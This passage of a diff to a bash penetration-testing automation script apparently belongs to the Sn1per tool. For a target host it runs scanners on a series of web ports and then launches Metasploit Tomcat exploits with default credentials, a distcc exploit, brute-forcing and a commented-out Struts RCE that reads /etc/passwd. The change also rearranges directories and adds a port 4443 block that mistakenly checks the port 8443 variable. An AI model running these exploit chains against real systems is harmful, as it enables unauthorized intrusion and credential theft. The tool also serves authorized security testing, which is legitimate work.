+			php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
 			rm -Rf output/ cookie.txt exploits.conf
 		fi
 	fi
@@ -1009,6 +1090,26 @@ else
 	msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
 fi
 
+if [ -z "$port_8443" ];
+then
+	echo -e "$OKRED + -- --=[Port 4443 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 4443 opened... running tests...$RESET"
+	wafw00f http://$TARGET:4443
+	echo ""
+	whatweb http://$TARGET:4443
+	echo ""
+	xsstracer $TARGET 4443
+	sslscan --no-failed $TARGET:4443
+	sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:4443
+	cd $PLUGINS_DIR/MassBleed
+	./massbleed $TARGET port 4443
+	cd $INSTALL_DIR
+	nikto -h https://$TARGET:4443 
+	cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
+	nmap -A -p 4443 -T5 --script=*proxy* $TARGET
+fi
+
 if [ -z "$port_5432" ];
 then
 	echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
@@ -1062,9 +1163,7 @@ else
 	xsstracer $TARGET 8000
 	cd ..
 	nikto -h http://$TARGET:8000 
-	cutycapt --url=http://$TARGET:8000 --out=loot/$TARGET-port8000.jpg
-	python jexboss/jexboss.py -host http://$TARGET:8000
-
+	cutycapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg
 fi
 
 if [ -z "$port_8100" ];
@@ -1078,12 +1177,11 @@ else
 	echo ""
 	xsstracer $TARGET 8100
 	sslscan --no-failed $TARGET:8100
-	cd MassBleed
+	cd $PLUGINS_DIR/MassBleed
 	./massbleed $TARGET port 8100
-	cd ..
+	cd $INSTALL_DIR
 	nikto -h http://$TARGET:8100 
-	cutycapt --url=http://$TARGET:8100 --out=loot/$TARGET-port8100.jpg
-	python jexboss/jexboss.py -host http://$TARGET:8100
+	cutycapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg
 fi
 
 if [ -z "$port_8080" ];
@@ -1097,18 +1195,15 @@ else
 	echo ""
 	xsstracer $TARGET 8080
 	sslscan --no-failed $TARGET:8080
-	cd MassBleed
+	cd $PLUGINS_DIR/MassBleed
 	./massbleed $TARGET port 8080
-	cd ..
+	cd $INSTALL_DIR
 	nikto -h http://$TARGET:8080 
-	cutycapt --url=http://$TARGET:8080 --out=loot/$TARGET-port8080.jpg
+	cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg
 	nmap -A -p 8080 -T5 --script=*proxy* $TARGET
 	msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
 	# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
 	# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
-	python jexboss/jexboss.py -host http://$TARGET:8080
-	python jexboss/jexboss.py -host https://$TARGET:8080
-	
 fi
 
 if [ -z "$port_8180" ];
@@ -1123,16 +1218,15 @@ else
 	xsstracer $TARGET 8180
 	sslscan --no-failed $TARGET:8180
 	sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8180
-	cd MassBleed
+	cd $PLUGINS_DIR/MassBleed
 	./massbleed $TARGET port 8180
-	cd ..
+	cd $INSTALL_DIR
 	nikto -h http://$TARGET:8180 
-	cutycapt --url=http://$TARGET:8180 --out=loot/$TARGET-port8180.jpg
+	cutycapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg
 	nmap -p 8180 -T5 --script=*proxy* $TARGET
 	echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
 	echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
 	msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
-	python jexboss/jexboss.py -host http://$TARGET:8180
 fi
 
 if [ -z "$port_8443" ];
@@ -1147,13 +1241,12 @@ else
 	xsstracer $TARGET 8443
 	sslscan --no-failed $TARGET:8443
 	sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8443
-	cd MassBleed
+	cd $PLUGINS_DIR/MassBleed
 	./massbleed $TARGET port 8443
-	cd ..
+	cd $INSTALL_DIR
 	nikto -h https://$TARGET:8443 
-	cutycapt --url=https://$TARGET:8443 --out=loot/$TARGET-port8443.jpg
+	cutycapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg
 	nmap -A -p 8443 -T5 --script=*proxy* $TARGET
-	python jexboss/jexboss.py -host https://$TARGET:8443	
 fi
 
 if [ -z "$port_8888" ];
@@ -1167,8 +1260,7 @@ else
 	echo ""
 	xsstracer $TARGET 8888
 	nikto -h http://$TARGET:8888 
-	cutycapt --url=https://$TARGET:8888 --out=loot/$TARGET-port8888.jpg
-	python jexboss/jexboss.py -host http://$TARGET:8888	
+	cutycapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg
 fi
 
 if [ -z "$port_10000" ];
@@ -1190,36 +1282,38 @@ else
 fi
 
 echo -e "$OKGREEN + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +$RESET"
-cd yasuo
+cd $PLUGINS_DIR/yasuo
 ruby yasuo.rb -r $TARGET -b all
-cd ..
+cd $SNIPER_DIR
+
+if [ "$FULLNMAPSCAN" = "0" ]; then
+	echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET"
+else
+	echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET"
+	nmap -T5 -sV -sU -sT -A -O -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+fi
 
 if [ "$AUTOBRUTE" = "0" ]; then
 	echo -e "$OKGREEN + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +$RESET"
 else
 	echo -e "$OKGREEN + -- ----------------------------=[Running Brute Force]=--------------------- -- +$RESET"
-	cd ../BruteX
-	./brutex $TARGET
+	brutex $TARGET
+	cd $INSTALL_DIR
 	rm -f hydra.restore
-	mv loot/* ../loot/
-	cd ..
-	echo ""
 	rm -f scan.log
+	echo ""
 fi
-cd $PWD/loot/
-echo -e "$OKORANGE + -- --=[Sorting loot directory ($PWD)"
-mkdir reports/ -p 2> /dev/null
+
+cd $LOOT_DIR
+echo -e "$OKORANGE + -- --=[Sorting loot directory ($LOOT_DIR)"
 echo -e "$OKORANGE + -- --=[Generating reports..."
-for a in `ls sniper-*.txt 2>/dev/null`; do echo "$a" >> reports/$a && sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a > reports/$a; done
-mv $PWD/report-* $PWD/reports/ 2> /dev/null
-mkdir $PWD/screenshots/ -p 2> /dev/null
-mv $PWD/*.jpg $PWD/screenshots/ 2> /dev/null
-mkdir $PWD/nmap -p 2> /dev/null
-mv $PWD/*.xml $PWD/nmap/ 2> /dev/null
-mkdir $PWD/domains -p 2> /dev/null
-mv $PWD/domains-* $PWD/domains/ 2> /dev/null
-mkdir $PWD/output -p 2> /dev/null
-mv $PWD/sniper-* $PWD/output 2> /dev/null
-rm -f $PWD/.fuse_* 2> /dev/null
+for a in `ls sniper-*.txt 2>/dev/null`; 
+do 
+	echo "$a" > $LOOT_DIR/reports/$a
+	sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
+	mv $a $LOOT_DIR/output/
+done
+rm -f $LOOT_DIR/.fuse_* 2> /dev/null
+
 echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
 exit 0